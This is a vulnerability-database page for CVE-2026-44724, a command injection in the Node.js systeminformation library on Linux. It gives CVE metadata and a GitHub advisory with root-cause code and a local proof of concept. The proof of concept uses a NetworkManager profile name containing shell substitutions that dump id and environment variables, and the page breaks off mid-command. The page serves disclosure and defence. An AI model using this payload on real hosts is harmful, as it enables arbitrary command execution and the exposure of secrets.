Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-44724 (GCVE-0-2026-44724)
Vulnerability from cvelistv5 – Published: 2026-05-27 19:26 – Updated: 2026-07-01 12:05- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
| URL | Tags |
|---|---|
| https://github.com/sebhildebrandt/systeminformati… | x_refsource_CONFIRM |
| https://access.redhat.com/security/cve/CVE-2026-44724 | vdb-entryx_refsource_REDHAT |
| https://bugzilla.redhat.com/show_bug.cgi?id=2482416 | issue-trackingx_refsource_REDHAT |
| https://security.access.redhat.com/data/csaf/v2/v… | x_sadp-csaf-vex |
| https://access.redhat.com/errata/RHSA-2026:33574 | vendor-advisoryx_refsource_REDHAT |
| Vendor | Product | Version | |
|---|---|---|---|
| sebhildebrandt | systeminformation |
Affected:
>= 4.17.0, < 5.31.6
|
|
| Red Hat | Red Hat Developer Hub 1.9 |
cpe:/a:redhat:rhdh:1.9::el9 |
|
| Red Hat | Red Hat OpenShift AI (RHOAI) |
cpe:/a:redhat:openshift_ai |
|
| Red Hat | Cryostat 4 |
cpe:/a:redhat:cryostat:4 |
|
| Red Hat | Multicluster Engine for Kubernetes |
cpe:/a:redhat:multicluster_engine |
|
| Red Hat | Red Hat Advanced Cluster Management for Kubernetes 2 |
cpe:/a:redhat:acm:2 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-44724",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-30T01:45:32.874409Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-30T01:45:59.001Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"affected": [
{
"cpes": [
"cpe:/a:redhat:rhdh:1.9::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Developer Hub 1.9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift AI (RHOAI)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:cryostat:4"
],
"defaultStatus": "unaffected",
"product": "Cryostat 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:multicluster_engine"
],
"defaultStatus": "unaffected",
"product": "Multicluster Engine for Kubernetes",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:acm:2"
],
"defaultStatus": "unaffected",
"product": "Red Hat Advanced Cluster Management for Kubernetes 2",
"vendor": "Red Hat"
}
],
"datePublic": "2026-05-27T19:26:28.392Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in systeminformation, a Node.js library. This vulnerability allows a local attacker on Linux to inject arbitrary commands. This occurs when an active NetworkManager connection profile name contains shell metacharacters, which are not properly sanitized before being used in shell commands. Successful exploitation can lead to arbitrary code execution."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-01T12:05:10.629Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2026-44724"
},
{
"name": "RHBZ#2482416",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482416"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-44724.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:33574: Red Hat Developer Hub 1.9"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-27T21:02:14.837Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-05-27T19:26:28.392Z",
"value": "Made public."
}
],
"title": "systeminformation: systeminformation: Command injection via NetworkManager connection profile name",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"product": "systeminformation",
"vendor": "sebhildebrandt",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.17.0, \u003c 5.31.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "systeminformation is a System and OS information library for node.js. From 4.17.0 to 5.31.5, on Linux, systeminformation is vulnerable to command injection in networkInterfaces() when an active NetworkManager connection profile name contains shell metacharacters. The vulnerable value is obtained internally from real nmcli device status output. The library sanitizes the network interface name before using it in shell commands, but it does not apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized connectionName is then interpolated into three shell command strings executed through execSync(). This vulnerability is fixed in 5.31.6."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-27T19:26:28.392Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9"
}
],
"source": {
"advisory": "GHSA-hvx9-hwr7-wjj9",
"discovery": "UNKNOWN"
},
"title": "systeminformation: Linux command injection in networkInterfaces() via unsanitized NetworkManager connection profile name"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-44724",
"datePublished": "2026-05-27T19:26:28.392Z",
"dateReserved": "2026-05-07T18:04:17.308Z",
"dateUpdated": "2026-07-01T12:05:10.629Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-44724",
"date": "2026-07-01",
"epss": "0.0062",
"percentile": "0.45245"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-44724\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-27T20:16:37.617\",\"lastModified\":\"2026-07-01T13:17:31.273\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"systeminformation is a System and OS information library for node.js. From 4.17.0 to 5.31.5, on Linux, systeminformation is vulnerable to command injection in networkInterfaces() when an active NetworkManager connection profile name contains shell metacharacters. The vulnerable value is obtained internally from real nmcli device status output. The library sanitizes the network interface name before using it in shell commands, but it does not apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized connectionName is then interpolated into three shell command strings executed through execSync(). This vulnerability is fixed in 5.31.6.\"}],\"affected\":[{\"source\":\"security-advisories@github.com\",\"affectedData\":[{\"vendor\":\"sebhildebrandt\",\"product\":\"systeminformation\",\"versions\":[{\"version\":\"\u003e= 4.17.0, \u003c 5.31.6\",\"status\":\"affected\"}]}]},{\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\",\"affectedData\":[{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Developer Hub 1.9\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:rhdh:1.9::el9\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat OpenShift AI (RHOAI)\",\"defaultStatus\":\"affected\",\"cpes\":[\"cpe:/a:redhat:openshift_ai\"]},{\"vendor\":\"Red Hat\",\"product\":\"Cryostat 4\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:cryostat:4\"]},{\"vendor\":\"Red Hat\",\"product\":\"Multicluster Engine for Kubernetes\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:multicluster_engine\"]},{\"vendor\":\"Red Hat\",\"product\":\"Red Hat Advanced Cluster Management for Kubernetes 2\",\"defaultStatus\":\"unaffected\",\"cpes\":[\"cpe:/a:redhat:acm:2\"]}]}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9},{\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}],\"ssvcV203\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"ssvcData\":{\"timestamp\":\"2026-05-30T01:45:32.874409Z\",\"id\":\"CVE-2026-44724\",\"options\":[{\"exploitation\":\"poc\"},{\"automatable\":\"no\"},{\"technicalImpact\":\"total\"}],\"role\":\"CISA Coordinator\",\"version\":\"2.0.3\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]},{\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"references\":[{\"url\":\"https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://access.redhat.com/errata/RHSA-2026:33574\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://access.redhat.com/security/cve/CVE-2026-44724\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://bugzilla.redhat.com/show_bug.cgi?id=2482416\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"},{\"url\":\"https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"},{\"url\":\"https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-44724.json\",\"source\":\"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"systeminformation: systeminformation: Command injection via NetworkManager connection profile name\", \"metrics\": [{\"other\": {\"type\": \"Red Hat severity rating\", \"content\": {\"value\": \"Important\", \"namespace\": \"https://access.redhat.com/security/updates/classification/\"}}}, {\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.8, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"cpes\": [\"cpe:/a:redhat:rhdh:1\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Developer Hub\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:openshift_ai\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat OpenShift AI (RHOAI)\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:cryostat:4\"], \"vendor\": \"Red Hat\", \"product\": \"Cryostat 4\", \"defaultStatus\": \"unaffected\"}, {\"cpes\": [\"cpe:/a:redhat:multicluster_engine\"], \"vendor\": \"Red Hat\", \"product\": \"Multicluster Engine for Kubernetes\", \"defaultStatus\": \"unaffected\"}, {\"cpes\": [\"cpe:/a:redhat:acm:2\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Advanced Cluster Management for Kubernetes 2\", \"defaultStatus\": \"unaffected\"}], \"timeline\": [{\"lang\": \"en\", \"time\": \"2026-05-27T21:02:14.837Z\", \"value\": \"Reported to Red Hat.\"}, {\"lang\": \"en\", \"time\": \"2026-05-27T19:26:28.392Z\", \"value\": \"Made public.\"}], \"x_adpType\": \"supplier\", \"datePublic\": \"2026-05-27T19:26:28.392Z\", \"references\": [{\"url\": \"https://access.redhat.com/security/cve/CVE-2026-44724\", \"tags\": [\"vdb-entry\", \"x_refsource_REDHAT\"]}, {\"url\": \"https://bugzilla.redhat.com/show_bug.cgi?id=2482416\", \"name\": \"RHBZ#2482416\", \"tags\": [\"issue-tracking\", \"x_refsource_REDHAT\"]}, {\"url\": \"https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-44724.json\", \"tags\": [\"x_sadp-csaf-vex\"]}], \"workarounds\": [{\"lang\": \"en\", \"value\": \"Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.\"}], \"x_generator\": {\"engine\": \"sadp-cli 1.0.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"A flaw was found in systeminformation, a Node.js library. This vulnerability allows a local attacker on Linux to inject arbitrary commands. This occurs when an active NetworkManager connection profile name contains shell metacharacters, which are not properly sanitized before being used in shell commands. Successful exploitation can lead to arbitrary code execution.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"0b0ca135-0b70-47e7-9f44-1890c2a1c46c\", \"shortName\": \"redhat-SADP\", \"dateUpdated\": \"2026-06-30T03:18:59.992Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-44724\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-30T01:45:32.874409Z\"}}}], \"references\": [{\"url\": \"https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-30T01:45:51.965Z\"}}], \"cna\": {\"title\": \"systeminformation: Linux command injection in networkInterfaces() via unsanitized NetworkManager connection profile name\", \"source\": {\"advisory\": \"GHSA-hvx9-hwr7-wjj9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.8, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"sebhildebrandt\", \"product\": \"systeminformation\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 4.17.0, \u003c 5.31.6\"}]}], \"references\": [{\"url\": \"https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9\", \"name\": \"https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"systeminformation is a System and OS information library for node.js. From 4.17.0 to 5.31.5, on Linux, systeminformation is vulnerable to command injection in networkInterfaces() when an active NetworkManager connection profile name contains shell metacharacters. The vulnerable value is obtained internally from real nmcli device status output. The library sanitizes the network interface name before using it in shell commands, but it does not apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized connectionName is then interpolated into three shell command strings executed through execSync(). This vulnerability is fixed in 5.31.6.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-27T19:26:28.392Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-44724\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-30T03:18:59.992Z\", \"dateReserved\": \"2026-05-07T18:04:17.308Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-27T19:26:28.392Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-44724
Vulnerability from fkie_nvd - Published: 2026-05-27 20:16 - Updated: 2026-07-01 13:177.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
| Vendor | Product | Version |
|---|
{
"affected": [
{
"affectedData": [
{
"product": "systeminformation",
"vendor": "sebhildebrandt",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.17.0, \u003c 5.31.6"
}
]
}
],
"source": "security-advisories@github.com"
},
{
"affectedData": [
{
"cpes": [
"cpe:/a:redhat:rhdh:1.9::el9"
],
"defaultStatus": "affected",
"product": "Red Hat Developer Hub 1.9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift AI (RHOAI)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:cryostat:4"
],
"defaultStatus": "unaffected",
"product": "Cryostat 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:multicluster_engine"
],
"defaultStatus": "unaffected",
"product": "Multicluster Engine for Kubernetes",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:acm:2"
],
"defaultStatus": "unaffected",
"product": "Red Hat Advanced Cluster Management for Kubernetes 2",
"vendor": "Red Hat"
}
],
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "systeminformation is a System and OS information library for node.js. From 4.17.0 to 5.31.5, on Linux, systeminformation is vulnerable to command injection in networkInterfaces() when an active NetworkManager connection profile name contains shell metacharacters. The vulnerable value is obtained internally from real nmcli device status output. The library sanitizes the network interface name before using it in shell commands, but it does not apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized connectionName is then interpolated into three shell command strings executed through execSync(). This vulnerability is fixed in 5.31.6."
}
],
"id": "CVE-2026-44724",
"lastModified": "2026-07-01T13:17:31.273",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-44724",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "no"
},
{
"technicalImpact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-30T01:45:32.874409Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-05-27T20:16:37.617",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/security/cve/CVE-2026-44724"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482416"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-44724.json"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"type": "Secondary"
}
]
}
GHSA-HVX9-HWR7-WJJ9
Vulnerability from github – Published: 2026-05-13 15:29 – Updated: 2026-06-08 23:53Summary
On Linux, systeminformation is vulnerable to command injection in networkInterfaces() when an active NetworkManager connection profile name contains shell metacharacters.
This is not caused by a caller passing attacker-controlled arguments into networkInterfaces(). The vulnerable value is obtained internally from real nmcli device status output. The library sanitizes the network interface name before using it in shell commands, but it does not apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized connectionName is then interpolated into three shell command strings executed through execSync().
This issue was validated locally against real NetworkManager and real nmcli. Calling only:
require('./lib').networkInterfaces()
was enough to trigger execution. The injected command ran with the privileges of the calling Node.js process.
Affected Component & Versions
Affected component:
lib/network.jsnetworkInterfaces()- Linux NetworkManager /
nmclihandling
Impact & Threat Model
Confirmed impact:
An attacker who can create or rename an active NetworkManager connection profile can execute arbitrary shell commands when a Node.js process using systeminformation calls networkInterfaces().
Confirmed realistic affected deployments include:
- local inventory agents
- monitoring agents
- diagnostics tools
- admin dashboard backends collecting host information
- privileged local desktop or device-management agents
If such a process runs with elevated privileges, the injected command executes with those same elevated privileges.
Confirmed facts:
- The payload was stored as a real NetworkManager connection profile name.
- Real
nmcli device statusreturned the name unchanged. networkInterfaces()parsed that value and reused it in shell commands.- The injected command ran as the calling Node.js process.
- Environment key categories were reachable from the injected process context.
Not claimed:
- No remote exploitation claim is made.
- No
AV:NorAV:Aclaim is made. - No SSID-to-connection-name attack path is claimed.
- File-delivery-only
.nmconnectionimport was not confirmed as a remote or unauthenticated path.
Root Cause Analysis
The root cause is inconsistent trust handling between the Linux interface name and the NetworkManager connection profile name.
The interface name is sanitized before it is embedded into shell commands:
const iface = dev.split(':')[0].trim();
const s = util.isPrototypePolluted() ? '---' : util.sanitizeShellString(iface);
However, the NetworkManager connection name is parsed from command output and later reused without equivalent sanitization:
const connectionNameLines = resultFormat.split(' ').slice(3);
const connectionName = connectionNameLines.join(' ');
return connectionName !== '--' ? connectionName : '';
That is unsafe because NetworkManager profile names can contain shell metacharacters. Quoting the value inside "${connectionName}" does not make it safe. A connection name containing ", $(), ;, backticks, or similar shell syntax can break out of the intended argument context or trigger command substitution.
The vulnerable code executes through execSync(), which invokes a shell for command strings. As a result, interpolating connectionName into the command string creates a command-injection sink.
Exact Code Flow & File Paths
Source: lib/network.js:538-544
function getLinuxIfaceConnectionName(interfaceName) {
const cmd = `nmcli device status 2>/dev/null | grep ${interfaceName}`;
try {
const result = execSync(cmd, util.execOptsLinux).toString();
const resultFormat = result.replace(/\s+/g, ' ').trim();
const connectionNameLines = resultFormat.split(' ').slice(3);
The parsed value is then returned as connectionName.
Trigger: lib/network.js:987-991
lines = execSync(cmd, util.execOptsLinux).toString().split('\n');
const connectionName = getLinuxIfaceConnectionName(ifaceSanitized);
dhcp = getLinuxIfaceDHCPstatus(ifaceSanitized, connectionName, _dhcpNics);
dnsSuffix = getLinuxIfaceDNSsuffix(connectionName);
ieee8021xAuth = getLinuxIfaceIEEE8021xAuth(connectionName);
Sink 1: lib/network.js:620
const cmd = `nmcli connection show "${connectionName}" 2>/dev/null | grep ipv4.method;`;
Sink 2: lib/network.js:660
const cmd = `nmcli connection show "${connectionName}" 2>/dev/null | grep ipv4.dns-search;`;
Sink 3: lib/network.js:676
const cmd = `nmcli connection show "${connectionName}" 2>/dev/null | grep 802-1x.eap;`;
There are three distinct exploitable connectionName sinks.
Proof of Concept (PoC) & Reproduction Steps
The following PoC is harmless and local-only. It uses a dummy NetworkManager connection and writes proof files under /tmp.
Run from the project root:
cd /path/to/systeminformation
Confirm proof files do not already exist:
test -e /tmp/si-nm-id-proof && echo EXISTS || echo NOT_YET
test -e /tmp/si-nm-pwd-proof && echo EXISTS || echo NOT_YET
test -e /tmp/si-nm-env-proof && echo EXISTS || echo NOT_YET
Create a malicious NetworkManager dummy profile:
nmcli connection add type dummy ifname si-nmghsa0 con-name 'si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)'
Assign a documentation-only address so Node’s os.networkInterfaces() sees the dummy interface:
nmcli connection modify 'si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)' \
ipv4.method manual \
ipv4.addresses 192.0.2.253/32 \
ipv6.method disabled
Activate the profile:
nmcli connection up 'si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)'
Confirm real nmcli exposes the malicious connection name unchanged:
nmcli device status | grep si-nmghsa0
Expected relevant output includes the active connection name:
si-nmghsa0 dummy connected si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)
Trigger the vulnerable library path with no attacker-controlled function argument:
node -e "const si=require('./lib'); si.networkInterfaces().then((interfaces)=>{const item=interfaces.find((entry)=>entry.iface==='si-nmghsa0'); console.log('saw_dummy_iface=' + Boolean(item)); if (item)
